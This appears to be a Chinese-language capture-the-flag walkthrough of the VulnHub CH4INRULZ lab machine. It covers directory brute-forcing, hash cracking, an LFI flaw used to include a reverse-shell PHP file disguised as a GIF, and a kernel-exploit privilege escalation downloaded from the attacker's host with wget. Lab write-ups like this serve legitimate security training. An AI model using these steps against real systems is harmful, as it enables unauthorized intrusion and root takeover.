渗透测试之靶机试炼（六）

靶机简介

靶机地址：
https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova.torrent ( Magnet

运行环境：
VirtualBox

攻击测试机环境
kali
win 10

工具简介
nmap
dirb
python

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。
首先nmap全网段扫描，找到目标主机ip
命令 nmap 10.211.55.0/24
访问80端口
信息收集一波，没有什么发现。爆破目录。
发现一个http://10.211.55.29/development/ 需要登录
但是没有账户密码，继续收集，御剑目录扫描找到主页备份文件
index.html.bak

直接访问下载查看，发现用户名及hash加密的密码
使用kali自带工具进行解密
将用户名及hash密码存入hash.txt
执行 john hash.txt
账号：frank
密码：frank！！！
登录成功
根据提示访问http://10.211.55.29/development/uploader/
有个上传位置，经过测试，只能上传jpg，png及gif等。没成功。
继续收集信息，之前发现的8011端口，
目录爆破一波
dirb http://10.211.55.29:8011/
发现一个api目录，查看
发现一个file_api.php的文件，访问
http://10.211.55.29:8011/api/files_api.php
根据提示，少参数，我们加上参数
http://10.211.55.29:8011/api/files_api.php?file=
提示是错误的输入
我们更改为post方法传输尝试
并没有报错，执行成功，怀疑存在LFI漏洞。尝试读取/etc/passwd文件
这里综合利用一下，之前有一个上传不能直接上传木马，这里利用这个文件包含漏洞拿shell
首先我们先上传一个gif文件，内容为反弹shell到本地的1234端口
我们利用kali自带的shell，位置是/usr/share/webshells/php/php-reverse-shell.php
修改其中的反弹shell的地址，然后在文件开头加上GIF89
修改文件后缀为gif，然后上传

然后我们来找上传的文件的具体位置，这里就是经过猜测得到目录的
http://10.211.55.29/development/uploader/FRANKuploads/
在本机利用nc监视1234端口，利用文件包含漏洞，包含我们的shell，文件的绝对路径为/var/www/
执行成功反弹回shell

提权

获取交互式shell
命令：
python -c ‘import pty; pty.spawn("/bin/bash")’

查看内核版本
内核版本为2.6.35，google找一下 好几个提权 最终利用15285.c进行提权，这个kali自带
将其拷贝至当前目录下

利用python开启简单的Web服务
利用拿到的shell进行下载，这里需要切换目录，当前目录没有权限，这里选择tmp目录
命令 wget http://10.211.55.8:8888/15285.c（作者这个shell不知为什么会双写）
然后对该文件进行编译，添加执行权限
命令 gcc 15285.c -o 15285
chmod 777 15285
执行该文件，拿到root权限